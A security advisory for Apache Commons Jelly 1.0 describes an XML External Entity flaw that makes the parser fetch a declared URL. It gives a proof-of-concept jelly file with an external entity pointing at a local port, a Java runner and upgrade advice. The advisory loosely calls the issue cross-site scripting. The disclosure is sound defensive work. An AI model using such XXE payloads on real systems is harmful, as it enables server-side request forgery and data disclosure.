Apache Commons Jelly connects to url with certain custom doctype definitions.

**Severity**: Medium **Vendor**: The Apache Software Foundation **Versions Affected:** commons-jelly-1.0 (core), namely commons-jelly-1.0.jar **Description**: During jelly (xml) file parsing with xerces, if a custom doctype entity is declared with a ?SYSTEM? entity with a url and that entity is used in the body of the jelly file, during parser instantiation the parser will attempt to connect to said url. This could be a cross site scripting concern. The Open Web Application Security Project suggests that the fix be https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#XMLReader **Mitigation**: 1.0 users should migrate to 1.0.1. **Credit**: This was discovered by Luca Carettoni of Doyensec. **Example**: example.jelly <?xml version="1.0"?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://127.0.0.1:4444/"> ]> <r>&sp;</r> <j:jelly trim="false" xmlns:j="jelly:core" xmlns:x="jelly:xml" xmlns:html="jelly:html"> </j:jelly> ExampleParser.java public class ExampleParser { public static void main(String[] args) throws JellyException, IOException, NoSuchMethodException, IllegalAccessException,IllegalArgumentException, InvocationTargetException { JellyContext context = new JellyContext(); context.runScript("example.jelly", null); } }